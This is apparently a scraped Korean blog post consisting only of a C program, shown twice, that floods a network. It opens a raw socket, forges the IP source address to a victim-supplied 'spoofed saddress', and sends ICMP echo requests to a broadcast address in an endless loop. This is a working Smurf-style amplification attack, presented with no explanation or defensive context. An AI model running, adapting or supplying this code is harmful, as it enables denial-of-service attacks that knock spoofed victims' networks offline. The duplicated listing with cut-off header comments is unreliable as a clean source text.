반응형
* Copyright (c) 2011 Jae-young, Park <onurmark1@gmail.com>
*
* License: http://www.onurmark.co.kr/?page_id=48
*
* Please DON'T REMOVE THIS COMMENTS for any reuse or distribution.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <string.h>
#include <arpa/inet.h>
#define PCKT_LEN 512
unsigned short csum(unsigned short *buf, int len)
{
unsigned long sum;
for (sum = 0; len > 0; len--)
sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return (unsigned short)(~sum);
}
int main(int argc, char **argv)
{
int s, i;
char buffer[PCKT_LEN];
struct iphdr *ipheader = (struct iphdr *)buffer;
struct icmphdr *icmpheader = (struct icmphdr *)(buffer + sizeof(struct iphdr));
struct sockaddr_in dst;
int on;
if (argc < 3) {
printf("\nUsage: %s <spoofed saddress> <broadcast address>\n", argv[0]);
exit(1);
}
on = 1;
memset(buffer, 0x0, PCKT_LEN);
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("Error: socket()");
exit(1);
}
// Inform the kernel do not fill up the headers' structure, we fabricated our own
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
perror("Error: setsockopt()");
exit(1);
}
// Set use broadcast address
if (setsockopt(s, SOL_SOCKET, SO_BROADCAST, &on, sizeof(on)) < 0) {
perror("Error: setsockopt() - boradcast");
exit(1);
}
// IP structure
ipheader->version = 4;
ipheader->ihl = sizeof(struct iphdr) >> 2;
ipheader->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr));
ipheader->ttl = 128;
ipheader->protocol = IPPROTO_ICMP;
ipheader->daddr = inet_addr(argv[2]);
ipheader->saddr = inet_addr(argv[1]);
dst.sin_family = AF_INET;
dst.sin_addr.s_addr = ipheader->daddr;
// ICMP structure
icmpheader->type = ICMP_ECHO;
icmpheader->code = 0;
icmpheader->un.echo.id = 0xae23;
icmpheader->un.echo.sequence = htons(1);
// Checksum
ipheader->check = csum((unsigned short *)buffer, (sizeof(struct iphdr) + sizeof(struct icmphdr)));
icmpheader->checksum = csum((unsigned short *)icmpheader, sizeof(struct icmphdr));
while(1) {
if (sendto(s, buffer, sizeof(struct iphdr) + sizeof(struct icmphdr), 0, (struct sockaddr *)&dst, sizeof(dst)) < 0) {
perror("sendto() error");
}
}
close(s);
return 0;
}
*
* License: http://www.onurmark.co.kr/?page_id=48
*
* Please DON'T REMOVE THIS COMMENTS for any reuse or distribution.
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <string.h>
#include <arpa/inet.h>
#define PCKT_LEN 512
unsigned short csum(unsigned short *buf, int len)
{
unsigned long sum;
for (sum = 0; len > 0; len--)
sum += *buf++;
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
return (unsigned short)(~sum);
}
int main(int argc, char **argv)
{
int s, i;
char buffer[PCKT_LEN];
struct iphdr *ipheader = (struct iphdr *)buffer;
struct icmphdr *icmpheader = (struct icmphdr *)(buffer + sizeof(struct iphdr));
struct sockaddr_in dst;
int on;
if (argc < 3) {
printf("\nUsage: %s <spoofed saddress> <broadcast address>\n", argv[0]);
exit(1);
}
on = 1;
memset(buffer, 0x0, PCKT_LEN);
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("Error: socket()");
exit(1);
}
// Inform the kernel do not fill up the headers' structure, we fabricated our own
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0) {
perror("Error: setsockopt()");
exit(1);
}
// Set use broadcast address
if (setsockopt(s, SOL_SOCKET, SO_BROADCAST, &on, sizeof(on)) < 0) {
perror("Error: setsockopt() - boradcast");
exit(1);
}
// IP structure
ipheader->version = 4;
ipheader->ihl = sizeof(struct iphdr) >> 2;
ipheader->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr));
ipheader->ttl = 128;
ipheader->protocol = IPPROTO_ICMP;
ipheader->daddr = inet_addr(argv[2]);
ipheader->saddr = inet_addr(argv[1]);
dst.sin_family = AF_INET;
dst.sin_addr.s_addr = ipheader->daddr;
// ICMP structure
icmpheader->type = ICMP_ECHO;
icmpheader->code = 0;
icmpheader->un.echo.id = 0xae23;
icmpheader->un.echo.sequence = htons(1);
// Checksum
ipheader->check = csum((unsigned short *)buffer, (sizeof(struct iphdr) + sizeof(struct icmphdr)));
icmpheader->checksum = csum((unsigned short *)icmpheader, sizeof(struct icmphdr));
while(1) {
if (sendto(s, buffer, sizeof(struct iphdr) + sizeof(struct icmphdr), 0, (struct sockaddr *)&dst, sizeof(dst)) < 0) {
perror("sendto() error");
}
}
close(s);
return 0;
}
반응형